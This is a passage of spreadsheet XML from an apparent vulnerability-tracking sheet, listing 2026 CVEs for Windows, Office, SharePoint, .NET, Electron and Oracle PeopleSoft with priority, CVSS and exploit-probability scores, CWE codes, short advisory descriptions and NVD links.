        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1078" s="5" t="inlineStr"/>
      <c r="F1078" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1078" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69631</t>
        </is>
      </c>
      <c r="C1079" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1079" s="5" t="inlineStr"/>
      <c r="F1079" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1079" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69710</t>
        </is>
      </c>
      <c r="C1080" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1080" s="5" t="inlineStr"/>
      <c r="F1080" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1080" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69739</t>
        </is>
      </c>
      <c r="C1081" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1081" s="5" t="inlineStr"/>
      <c r="F1081" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1081" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1081" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="I1081" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69744</t>
        </is>
      </c>
      <c r="C1082" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1082" s="5" t="inlineStr"/>
      <c r="F1082" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1082" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1082" s="5" t="inlineStr"/>
      <c r="I1082" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69760</t>
        </is>
      </c>
      <c r="C1083" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1083" s="5" t="inlineStr"/>
      <c r="F1083" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1083" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1083" s="5" t="inlineStr"/>
      <c r="I1083" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1083" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69793</t>
        </is>
      </c>
      <c r="C1084" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1084" s="5" t="inlineStr"/>
      <c r="F1084" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1084" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1084" s="5" t="inlineStr"/>
      <c r="I1084" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr">
        <is>
          <t>CWE-1288</t>
        </is>
      </c>
      <c r="L1084" s="5" t="inlineStr">
        <is>
          <t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69803</t>
        </is>
      </c>
      <c r="C1085" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1085" s="5" t="inlineStr"/>
      <c r="F1085" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1085" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1085" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1085" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69804</t>
        </is>
      </c>
      <c r="C1086" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1086" s="5" t="inlineStr"/>
      <c r="F1086" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1086" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1086" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="I1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1086" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69805</t>
        </is>
      </c>
      <c r="C1087" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1087" s="5" t="inlineStr"/>
      <c r="F1087" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1087" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1087" s="5" t="inlineStr"/>
      <c r="I1087" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522, CWE-73</t>
        </is>
      </c>
      <c r="L1087" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69809</t>
        </is>
      </c>
      <c r="C1088" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1088" s="5" t="inlineStr"/>
      <c r="F1088" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1088" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1088" s="5" t="inlineStr"/>
      <c r="I1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1088" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="C1089" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1089" s="5" t="inlineStr"/>
      <c r="F1089" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1089" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1089" s="5" t="inlineStr"/>
      <c r="I1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1089" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="C1090" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1090" s="5" t="inlineStr"/>
      <c r="F1090" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1090" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1090" s="5" t="inlineStr"/>
      <c r="I1090" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1090" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="C1091" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1091" s="5" t="inlineStr"/>
      <c r="F1091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1091" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1091" s="5" t="inlineStr"/>
      <c r="I1091" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1091" s="5" t="inlineStr"/>
      <c r="K1091" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1091" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t>
        </is>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69929</t>
        </is>
      </c>
      <c r="C1092" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1092" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1092" s="5" t="inlineStr"/>
      <c r="F1092" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1092" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1092" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1092" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1092" s="5" t="inlineStr"/>
      <c r="K1092" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1092" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t>
        </is>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69930</t>
        </is>
      </c>
      <c r="C1093" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1093" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1093" s="5" t="inlineStr"/>
      <c r="F1093" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1093" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1093" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1093" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1093" s="5" t="inlineStr"/>
      <c r="K1093" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1093" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t>
        </is>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70065</t>
        </is>
      </c>
      <c r="C1094" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1094" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1094" s="5" t="inlineStr"/>
      <c r="F1094" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1094" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1094" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1094" s="5" t="inlineStr"/>
      <c r="K1094" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1094" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t>
        </is>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70124</t>
        </is>
      </c>
      <c r="C1095" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1095" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1095" s="5" t="inlineStr"/>
      <c r="F1095" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1095" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1095" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1095" s="5" t="inlineStr"/>
      <c r="K1095" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1095" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t>
        </is>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70570</t>
        </is>
      </c>
      <c r="C1096" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1096" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1096" s="5" t="inlineStr"/>
      <c r="F1096" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1096" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1096" s="5" t="inlineStr"/>
      <c r="I1096" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1096" s="5" t="inlineStr"/>
      <c r="K1096" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1096" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="M1096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t>
        </is>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70579</t>
        </is>
      </c>
      <c r="C1097" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1097" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1097" s="5" t="inlineStr"/>
      <c r="F1097" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1097" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1097" s="5" t="inlineStr"/>
      <c r="I1097" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1097" s="5" t="inlineStr"/>
      <c r="K1097" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1097" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t>
        </is>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70587</t>
        </is>
      </c>
      <c r="C1098" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1098" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1098" s="5" t="inlineStr"/>
      <c r="F1098" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1098" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1098" s="5" t="inlineStr"/>
      <c r="I1098" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1098" s="5" t="inlineStr"/>
      <c r="K1098" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="L1098" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70601</t>
        </is>
      </c>
      <c r="C1099" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1099" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1099" s="5" t="inlineStr"/>
      <c r="F1099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1099" s="5" t="inlineStr">
        <is>
          <t>windows, java, node.js</t>
        </is>
      </c>
      <c r="H1099" s="5" t="inlineStr"/>
      <c r="I1099" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1099" s="5" t="inlineStr"/>
      <c r="K1099" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L1099" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5, apps that expose Promise-returning functions to web content via contextBridge may be vulnerable to a context isolation bypass. Untrusted web content could obtain access to the isolated preload world and, through it, every capability the preload script has. In renderers without a sandbox, or with nodeIntegration enabled, this may escalate to Node.js access. Apps are affected if they expose Promise-returning functions via contextBridge, the standard pattern for wrapping ipcRenderer.invoke, in windows that load untrusted content. This issue is fixed in versions 39.8.9, 40.9.2, 41.2.2, and 42.0.0-beta.5.</t>
        </is>
      </c>
      <c r="M1099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70601</t>
        </is>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71092</t>
        </is>
      </c>
      <c r="C1100" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1100" s="5" t="inlineStr"/>
      <c r="F1100" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1100" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H1100" s="5" t="inlineStr">
        <is>
          <t>oracle:peoplesoft_lease_administration</t>
        </is>
      </c>
      <c r="I1100" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1100" s="5" t="inlineStr"/>
      <c r="K1100" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1100" s="5" t="inlineStr">
        <is>
